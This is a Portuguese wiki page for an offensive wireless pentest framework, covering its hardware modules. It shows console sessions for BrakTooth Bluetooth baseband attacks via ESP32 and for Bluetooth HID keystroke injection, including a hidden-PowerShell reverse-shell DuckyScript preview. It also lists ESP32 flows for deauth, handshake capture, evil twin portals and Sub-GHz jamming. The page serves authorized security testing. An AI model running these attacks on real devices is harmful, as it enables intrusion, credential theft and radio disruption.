Skip to content

Hardware ptBR

Jump to bottom
André Henrique edited this page Jun 8, 2026 · 1 revision

Idioma: Português (pt-BR) | English: Hardware

Hardware

Módulos de ataque específicos de hardware que requerem dispositivos físicos especializados: BrakTooth via ESP32, injeção HID Bluetooth e exploração de hardware correlata.

Referência de Módulos

Módulo Descrição
bluetooth/bt_baseband_attack BrakTooth / SweynTooth via serial ESP32
bluetooth/bt_hid_injection Injeção de teclado HID Bluetooth (fallback Broadcom)
bluetooth/bt_hid_keyboard_inject Injeção de teclado HID estendida (BlueZ / Broadcom)
external/bruce_serial_bridge Motor de fluxo serial do firmware Bruce ESP32

BrakTooth - Ataques de Baseband ESP32

O BrakTooth é uma família de vulnerabilidades de baseband Bluetooth Classic (BR/EDR) que afeta mais de 1.400 produtos. Requerem firmware especializado para prova de conceito, tipicamente executado em um ESP32 com acesso ao HCI Bluetooth.

Resumo de CVEs

CVE Chip Impacto CVSS
CVE-2021-28135 Espressif ESP32 Crash em LMP AU_RAND 7,5
CVE-2021-28136 Espressif ESP32 Crash em LMP LMP_timing_accuracy_req 7,5
CVE-2021-28139 Espressif ESP32 Escrita OOB via LMP_feature_req 8,8
CVE-2021-31609 Intel AX200 DoS via overflow LMP_SRES 7,5
CVE-2021-31612 Qualcomm WCN3990 Deadlock via LMP_detach 7,5
CVE-2021-34143 Texas Instruments CC256x DoS via configuração de link SCO 7,5

Uso

wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > show options

Options:
  TARGET_MAC    (required)  Endereço MAC Bluetooth do alvo
  ATTACK_TYPE   braktooth    Tipo de ataque (braktooth, sweyntooth)
  CVE           auto        CVE específico a testar (auto = detectar melhor correspondência)
  SERIAL_PORT   /dev/ttyACM0  Porta serial ESP32
  SERIAL_BAUD   115200      Taxa de baud serial
  SIMULATE      true        Simulação sem transmitir

wxf (BTBasebandAttack) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTBasebandAttack) > set ATTACK_TYPE braktooth
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0
wxf (BTBasebandAttack) > set SIMULATE true
wxf (BTBasebandAttack) > run

[SIMULATE] BrakTooth attack setup
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Serial: /dev/ttyACM0 @ 115200

[SIMULATE] Step 1: Probe target chip vendor via LMP features...
[SIMULATE]   Expected: detect Espressif, Qualcomm, TI, Intel, or Broadcom
[SIMULATE] Step 2: Select CVE based on chip detection
[SIMULATE] Step 3: Transmit crafted LMP frame via ESP32

[SIMULATE] Without hardware: this module requires:
[SIMULATE]   - ESP32 with BT HCI firmware (wrover or devkit)
[SIMULATE]   - braktooth_esp32_bluetooth_classic_attack_poc firmware flashed
[SIMULATE]   - Serial connection (/dev/ttyACM0 or /dev/ttyUSB0)
[!] Set SIMULATE=false and connect ESP32 to run

Configuração do firmware ESP32

# Clonar o PoC BrakTooth
git clone https://github.com/Matheus-Garbelini/esp32_bluetooth_classic_sniffer.git
cd esp32_bluetooth_classic_sniffer

# Instalar ESP-IDF (se ainda não instalado)
# Gravar firmware no ESP32
idf.py -p /dev/ttyACM0 flash

# Conectar WXF via serial
wxf > use generic/bluetooth/bt_baseband_attack
wxf (BTBasebandAttack) > set SERIAL_PORT /dev/ttyACM0

Injeção HID Bluetooth

A injeção HID (Human Interface Device) Bluetooth permite que um atacante envie entrada de teclado para um dispositivo alvo sem pareamento por PIN, explorando vulnerabilidades de pareamento Bluetooth ou utilizando uma conexão já pareada.

HID Bluetooth Clássico (Broadcom)

wxf > use generic/bluetooth/bt_hid_injection
wxf (BTHIDInjection) > show options

Options:
  TARGET_MAC    (required)  MAC Bluetooth do dispositivo alvo
  PAYLOAD       (required)  Teclas a injetar (raw ou arquivo de script)
  DELAY_MS      50          Intervalo entre teclas em milissegundos
  METHOD        broadcom    Método de injeção (broadcom, bluez, simulate)
  SIMULATE      true        Simulação sem pareamento

wxf (BTHIDInjection) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (BTHIDInjection) > set PAYLOAD "cmd\nwhoami\n"
wxf (BTHIDInjection) > set METHOD broadcom
wxf (BTHIDInjection) > set SIMULATE true
wxf (BTHIDInjection) > run

[SIMULATE] Bluetooth HID keyboard injection
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Payload: 12 keystrokes
[SIMULATE]   Step 1: Discover target HID profile (HID_SERVICE_CLASS)
[SIMULATE]   Step 2: Initiate L2CAP HID connection (PSM 0x0011 control, 0x0013 interrupt)
[SIMULATE]   Step 3: Send HID Keyboard Report for each character
[SIMULATE]   Sequence: c-m-d-ENTER-w-h-o-a-m-i-ENTER

[SIMULATE] Keystroke sequence:
[SIMULATE]   c: HID scancode 0x06
[SIMULATE]   m: HID scancode 0x10
[SIMULATE]   d: HID scancode 0x07
[SIMULATE]   ENTER: HID scancode 0x28
[SIMULATE]   ...

[!] Set SIMULATE=false + METHOD=broadcom to inject live
[!] PREREQ: Broadcom Bluetooth adapter with patch support OR already paired device
[!] NOTE: Requires target device to have BT discoverable/connectable

Payloads no estilo DuckyScript

wxf (BTHIDInjection) > set PAYLOAD_FILE /payloads/windows_reverse_shell.btducky
wxf (BTHIDInjection) > run

[SIMULATE] Loading payload: /payloads/windows_reverse_shell.btducky
[SIMULATE] Lines: 25 commands | Estimated runtime: 4.5s at 50ms delay
[SIMULATE] Preview:
  GUI R                     (Win+R)
  DELAY 300
  STRING powershell -w hidden -c "IEX..."
  ENTER
  ...

Integração Bruce / ESP32 Marauder

O WXF inclui um motor completo de orquestração serial para o firmware BruceDevices.

Uso básico

wxf > use generic/external/bruce_serial_bridge
wxf (BruceSerialBridge) > set SERIAL_PORT /dev/ttyACM0
wxf (BruceSerialBridge) > set FLOW_PROFILE capture_handshake_flow
wxf (BruceSerialBridge) > run

[*] Connecting to Bruce firmware on /dev/ttyACM0...
[*] Firmware: Bruce v1.7.1 (ESP32-S3)
[*] Executing flow: capture_handshake_flow
[*] Step 1: WiFi scan...
[+] AP found: HomeWifi ch6 WPA2
[*] Step 2: Target: AA:BB:CC:DD:EE:FF
[*] Step 3: Deauth + capture...
[+] Handshake captured! Saved to /sdcard/handshake_AABBCCDDEEFF.pcap
[*] Flow complete.

Perfis de fluxo disponíveis

Perfil de Fluxo Descrição
baseline_status_flow Obter status do dispositivo e informações de firmware
capture_handshake_flow Scan WiFi + deauth + captura EAPOL
wifi_menu_navigation_flow Navegação interativa pelo menu WiFi
deauth_clone_verify_flow Deauth + evil twin + verificação de captura
sniffer_capture_flow Captura promíscua 802.11 bruta
evil_portal_karma_flow KARMA + configuração de portal cativo
wifi_attack_lab_flow Fluxo de laboratório de ataque multi-estágio
raw_sniffer_probe_flow Sniffer de requisições probe
wifi_bruteforce_recon_flow Reconhecimento WiFi + preparação para força bruta
navigation_recovery_flow Recuperar de estados de erro de menu
captive_portal_endpoint_config_flow Configurar endpoint de portal cativo
repeater_wisp_setup_flow Configurar repetidor WiFi / modo WISP
external_adapter_probe_flow Sondagem de adaptador USB externo
webui_password_flow Teste de credencial da interface web
target_attack_stability_flow Teste de estabilidade para ataques de longa duração
ble_recon_spam_flow Reconhecimento BLE + spam de advertising
ble_badble_recovery_flow Recuperação de erro BLE
rf_spectrum_scan_flow Scan de espectro Sub-GHz
rf_jammer_stability_flow Teste de estabilidade do interferer Sub-GHz

Fluxos declarativos personalizados

wxf (BruceSerialBridge) > set FLOW_JSON [{"command":"wifi scan","expect":"#","wait_ms":1200},{"command":"nav back","repeat":2,"expect":"#"}]
wxf (BruceSerialBridge) > run

[*] Running custom flow: 2 steps
[*] Step 1: wifi scan -> OK (1,243ms)
[*] Step 2: nav back x2 -> OK
[*] Flow complete.

Tabela de Compatibilidade de Hardware

Hardware Interface Módulos Notas
HackRF One USB (hackrf_transfer) Sub-GHz TX/RX, todos subghz/* Somente Linux/macOS
RTL-SDR USB (rtl-sdr) Sub-GHz RX (TPMS, OOK) Somente recepção
CC1101 + ESP32 SPI + USB serial Códigos estáticos Sub-GHz Opção TX econômica
Flipper Zero USB / microSD Replay .sub Sub-GHz WXF gera arquivos .sub
Bruce ESP32 USB serial Ataques WiFi/BLE, scan RF WXF orquestra via serial
Alfa AWUS036ACM USB (nl80211) Todos os módulos WiFi Melhor modo monitor no Linux
Ubertooth One USB Sniffing Bluetooth BR/EDR Pré-requisito BrakTooth/KNOB
Dongle nRF52840 USB (Sniffle) Sniffing BLE Pré-requisito SweynTooth
BlueZ HCI USB Bluetooth GATT BLE, HID, pareamento BT Linux padrão

Páginas relacionadas: Bluetooth e BLE | Ataques Sub-GHz | Configuração

Autor: André Henrique (@mrhenrike) | União Geek

WirelessXPL-Forge v1.8.0

Home-pt-BR | Home

Português (pt-BR)

Primeiros Passos

Ataques Wireless

Drones e UAV

Protocolos Especializados

Ferramentas de Pentest

Hardware

Clone this wiki locally